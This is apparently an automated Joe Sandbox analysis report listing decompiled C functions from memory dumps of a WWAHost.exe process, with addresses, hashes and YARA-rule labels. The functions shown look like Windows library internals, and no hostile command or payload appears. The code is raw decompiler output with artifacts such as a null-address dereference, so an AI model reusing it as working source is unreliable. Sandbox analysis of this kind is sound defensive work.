                                              0x039eb960
                                              0x039eb967
                                              0x039eb968
                                              0x039eb96a
                                              0x00000000
                                              0x039eb96a
                                              0x039eb99b
                                              0x039eb99e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039eb99e
                                              0x039eb951
                                              0x039eb954
                                              0x039eb95a
                                              0x039eb95e
                                              0x039eb972
                                              0x039eb979
                                              0x039eb97d
                                              0x039eb97f
                                              0x039eb980
                                              0x039eb982
                                              0x039eb984
                                              0x00000000
                                              0x039eb984
                                              0x00000000
                                              0x039eb926
                                              0x00000000
                                              0x039eb926

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e47f2532b5262224f4c4f5465f828c42fc9d963f2b9f93701b3bf61373be706d
                                              • Instruction ID: dbf4d75643c160cf2e050cd81588d32a458b40ddc5a096b0f1dbbdc7cad2ea8d
                                              • Opcode Fuzzy Hash: e47f2532b5262224f4c4f5465f828c42fc9d963f2b9f93701b3bf61373be706d
                                              • Instruction Fuzzy Hash: C9711F36204706EFEB32DF19C840F66BBE9EF80764F184928E6558B6E0DB71E941CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039D6DC9 Relevance: .2, Instructions: 199COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 79%
                                              			E039D6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E039D6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E03977D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03999AE0();
					_t87 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E039D795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E039D795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E039D795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E039D795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L03974620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E039D6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E039D6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E039D6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E039D6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E03977D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03999AE0();
								L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L03972400( &_v36);
							if(_v24 >= 0) {
								_t87 = L03972400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L03972400( &_v52);
							}
							if(_v28 >= 0) {
								return L03972400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                              0x039d6dd4
                                              0x039d6dde
                                              0x039d6de1
                                              0x039d6de3
                                              0x039d6de6
                                              0x039d6de9
                                              0x039d6dec
                                              0x039d6def
                                              0x039d6df2
                                              0x039d6df5
                                              0x039d6dfe
                                              0x039d6e04
                                              0x039d6e09
                                              0x039d6e0d
                                              0x039d6e18
                                              0x039d6e1b
                                              0x039d6e22
                                              0x039d6e2d
                                              0x039d6e30
                                              0x039d6e36
                                              0x039d6e42
                                              0x039d6e4d
                                              0x039d6e50
                                              0x039d6e55
                                              0x039d6e5c
                                              0x039d6e6e
                                              0x039d6e5e
                                              0x039d6e67
                                              0x039d6e67
                                              0x039d6e73
                                              0x039d6e74
                                              0x039d6e77
                                              0x039d6e7c
                                              0x039d6e7d
                                              0x039d6e8e
                                              0x039d6e93
                                              0x039d6e9c
                                              0x039d6ea8
                                              0x039d6eab
                                              0x039d6eac
                                              0x039d6eb3
                                              0x039d6ecd
                                              0x039d6edc
                                              0x039d6ee2
                                              0x039d6ee5
                                              0x039d6ef2
                                              0x039d6efb
                                              0x039d6f01
                                              0x039d6f06
                                              0x039d6f0b
                                              0x039d6f11
                                              0x039d6f1a
                                              0x039d6f22
                                              0x039d6f26
                                              0x039d6f26
                                              0x039d6f33
                                              0x039d6f41
                                              0x039d6f44
                                              0x039d6f47
                                              0x039d6f54
                                              0x039d6f65
                                              0x039d6f77
                                              0x039d6f7c
                                              0x039d6f82
                                              0x039d6f91
                                              0x039d6f99
                                              0x039d6fa3
                                              0x039d6fae
                                              0x039d6fae
                                              0x039d6fba
                                              0x039d6fbb
                                              0x039d6fbc
                                              0x039d6fc1
                                              0x039d6fc2
                                              0x039d6fd3
                                              0x039d6fd8
                                              0x039d6fd8
                                              0x039d6fdf
                                              0x039d6fe8
                                              0x039d6fee
                                              0x039d6fee
                                              0x039d6ff5
                                              0x039d6ffb
                                              0x039d6ffb
                                              0x039d7004
                                              0x00000000
                                              0x039d700a
                                              0x039d7004
                                              0x039d6eb3
                                              0x039d6e9c
                                              0x039d7015

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                              • Instruction ID: c2924737dcab60ff6ec34d61e75d12ca30b45b35cbc20cc45fcbd506f2456713
                                              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                              • Instruction Fuzzy Hash: F2717075A00609EFCB10DFA9C944AEEFBB9FF88714F144469E505EB290D734EA41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039552A5 Relevance: .2, Instructions: 161COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E039552A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0396EEF0(0x3a479a0);
					_t104 =  *0x3a48210; // 0xb52bb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0396EB70(_t93, 0x3a479a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E03999890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0396EEF0(0x3a479a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0396EB70(0, 0x3a479a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xb52bbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0398F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0396EEF0(0x3a479a0);
									__eflags =  *0x3a48210 - _t104; // 0xb52bb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x3a48210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E039D4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0396EB70(_t95, 0x3a479a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E039995D0();
											L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E039995D0();
											L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0396EB70(_t93, 0x3a479a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E039995D0();
										L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E039995D0();
										L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0398F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                              0x039552a5
                                              0x039552ad
                                              0x039552b0
                                              0x039552b3
                                              0x039552b7
                                              0x039552ba
                                              0x039552bf
                                              0x039552c4
                                              0x039552cc
                                              0x00000000
                                              0x00000000
                                              0x039552ce
                                              0x039552d9
                                              0x039552dd
                                              0x039552e7
                                              0x039552f7
                                              0x039552f9
                                              0x039552fd
                                              0x039b0dcf
                                              0x039b0dd5
                                              0x039b0dd6
                                              0x039b0dd7
                                              0x039b0dd8
                                              0x039b0dd9
                                              0x039b0dde
                                              0x039b0ddf
                                              0x039b0de0
                                              0x039b0de1
                                              0x039b0de2
                                              0x039b0de5
                                              0x039b0dea
                                              0x039b0dec
                                              0x039b0f60
                                              0x039b0f64
                                              0x039b0f70
                                              0x039b0f76
                                              0x039b0f79
                                              0x039b0f79
                                              0x00000000
                                              0x039b0f64
                                              0x039b0df2
                                              0x039b0df7
                                              0x039b0e04
                                              0x039b0e0d
                                              0x039b0e0d
                                              0x039b0e10
                                              0x039b0e1a
                                              0x039b0e1c
                                              0x039b0e4c
                                              0x039b0e52
                                              0x039b0e61
                                              0x039b0e67
                                              0x039b0e6b
                                              0x039b0e70
                                              0x039b0e76
                                              0x039b0ed7
                                              0x039b0edc
                                              0x039b0ee0
                                              0x039b0ee6
                                              0x039b0eea
                                              0x039b0eed
                                              0x039b0ef0
                                              0x039b0ef3
                                              0x039b0ef6
                                              0x039b0ef9
                                              0x039b0efe
                                              0x039b0f01
                                              0x039b0f01
                                              0x039b0f0b
                                              0x039b0f12
                                              0x039b0f16
                                              0x039b0f18
                                              0x039b0f1b
                                              0x039b0f2c
                                              0x039b0f31
                                              0x039b0f31
                                              0x039b0f35
                                              0x039b0f39
                                              0x039b0f3a
                                              0x039b0f3c
                                              0x039b0f3f
                                              0x039b0f50
                                              0x039b0f55
                                              0x039b0f55
                                              0x039b0f59
                                              0x039552eb
                                              0x039552f1
                                              0x039552f1
                                              0x039b0e7d
                                              0x039b0e84
                                              0x039b0e88
                                              0x039b0e8a
                                              0x039b0e8d
                                              0x039b0e9e
                                              0x039b0ea3
                                              0x039b0ea3
                                              0x039b0ea7
                                              0x039b0eaf
                                              0x039b0eb3
                                              0x039b0eb9
                                              0x039b0eb9
                                              0x039b0ebc
                                              0x039b0ecd
                                              0x039b0ecd
                                              0x00000000
                                              0x039b0eb3
                                              0x039b0e21
                                              0x039b0e2b
                                              0x039b0e2f
                                              0x039b0e30
                                              0x039b0e3a
                                              0x039b0e3f
                                              0x039b0e41
                                              0x00000000
                                              0x00000000
                                              0x039b0e47
                                              0x00000000
                                              0x039b0e47
                                              0x039b0df9
                                              0x039b0dfe
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x039b0dfe
                                              0x03955303
                                              0x03955307
                                              0x00000000
                                              0x03955309
                                              0x00000000
                                              0x03955309
                                              0x03955307
                                              0x039552e9
                                              0x039552e9
                                              0x00000000
                                              0x039552e9
                                              0x0395530e
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 560fab7eabfff61a9d6b1078af1cf6b71e4be5e4b825d4507055d9c818308c63
                                              • Instruction ID: 73ead8035fc10b5ecf366ad1e43e0dcb51d5410f1273ff0abb2dc0075c3971df
                                              • Opcode Fuzzy Hash: 560fab7eabfff61a9d6b1078af1cf6b71e4be5e4b825d4507055d9c818308c63
                                              • Instruction Fuzzy Hash: 5651E135205342AFD721EF68C940B6BB7E8FF80750F14491EF8A68B652E775E844C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03982AE4 Relevance: .2, Instructions: 159COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E03982AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x3a48204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x3a48208; // 0x3a48207
				_t8 = _t57 + 0x3a48208; // 0x3a48207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x3a48450; // 0xb5173a
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x3a4821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x3a46d5c; // 0x7f7c0654
							_t72 =  *0x3a46d5c; // 0x7f7c0654
							_t75 =  *0x3a46d5c; // 0x7f7c0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x3a46d5c; // 0x7f7c0654
							_t84 =  *0x3a46d5c; // 0x7f7c0654
							_t87 =  *0x3a46d5c; // 0x7f7c0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0399F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                              0x03982ae4
                                              0x03982aec
                                              0x03982aef
                                              0x03982af4
                                              0x03982af7
                                              0x03982afd
                                              0x03982b92
                                              0x03982b92
                                              0x03982b97
                                              0x03982b9c
                                              0x03982b9c
                                              0x03982b03
                                              0x03982b06
                                              0x03982b09
                                              0x03982b09
                                              0x03982b0f
                                              0x03982b15
                                              0x03982b15
                                              0x03982b1b
                                              0x03982b1e
                                              0x03982b21
                                              0x03982b26
                                              0x03982b29
                                              0x03982b81
                                              0x03982b84
                                              0x03982c0e
                                              0x03982c15
                                              0x03982c24
                                              0x03982c24
                                              0x03982b8a
                                              0x03982b8a
                                              0x03982b8a
                                              0x03982b8a
                                              0x03982b90
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03982b4a
                                              0x03982b4a
                                              0x03982b4d
                                              0x03982b53
                                              0x00000000
                                              0x00000000
                                              0x03982b55
                                              0x03982b58
                                              0x03982bb7
                                              0x039c5d1b
                                              0x039c5d37
                                              0x039c5d47
                                              0x039c5d53
                                              0x03982bbd
                                              0x03982bbd
                                              0x03982bbd
                                              0x03982bb7
                                              0x03982b5d
                                              0x03982c2f
                                              0x039c5d5b
                                              0x039c5d77
                                              0x039c5d87
                                              0x039c5d93
                                              0x03982c35
                                              0x03982c35
                                              0x03982c35
                                              0x03982c2f
                                              0x03982b65
                                              0x03982b9f
                                              0x03982ba2
                                              0x03982b67
                                              0x03982b67
                                              0x03982b69
                                              0x03982b6b
                                              0x03982b6e
                                              0x03982bc9
                                              0x03982bcc
                                              0x03982bcf
                                              0x03982bd4
                                              0x03982bd6
                                              0x03982bd6
                                              0x03982bdb
                                              0x03982c02
                                              0x03982c05
                                              0x03982c07
                                              0x00000000
                                              0x03982c07
                                              0x03982be0
                                              0x03982c00
                                              0x03982c3f
                                              0x03982c3f
                                              0x00000000
                                              0x03982c00
                                              0x03982be5
                                              0x03982be7
                                              0x03982bec
                                              0x03982bf4
                                              0x03982bf6
                                              0x00000000
                                              0x03982bf6
                                              0x03982b70
                                              0x03982b76
                                              0x03982b2b
                                              0x03982b2b
                                              0x03982b2d
                                              0x03982b2f
                                              0x03982b32
                                              0x03982b35
                                              0x03982b3a
                                              0x00000000
                                              0x03982b40
                                              0x03982b43
                                              0x03982b45
                                              0x03982b47
                                              0x03982b4a
                                              0x03982b4d
                                              0x03982b53
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03982b53
                                              0x03982b78
                                              0x03982b78
                                              0x03982b7b
                                              0x03982b7e
                                              0x00000000
                                              0x03982b7e
                                              0x03982b76
                                              0x03982ba5
                                              0x03982ba5
                                              0x03982ba8
                                              0x03982bad
                                              0x00000000
                                              0x00000000
                                              0x03982baf
                                              0x03982baf
                                              0x03982bc2
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a8e10ffd1aa208f909a9643efdbf25138ef7440936909f3a9d48755ce5f611e9
                                              • Instruction ID: 2dabd3cf645eaf090cb1bd1e2d36e4a3b9dc67c1b55fefe8deb031cde6d9f37f
                                              • Opcode Fuzzy Hash: a8e10ffd1aa208f909a9643efdbf25138ef7440936909f3a9d48755ce5f611e9
                                              • Instruction Fuzzy Hash: D751D3B6E011168FCB18EF1CC4909BDB7F5FBC9700715895AE896EB324E735AA41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A1AE44 Relevance: .2, Instructions: 152COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E03A1AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E03A1C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E03A1ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E03A1FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E03A1EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E03977D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E03A11608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E03A21536(0x3a48ae4, (_t74 -  *0x3a48b04 >> 0x14) + (_t74 -  *0x3a48b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
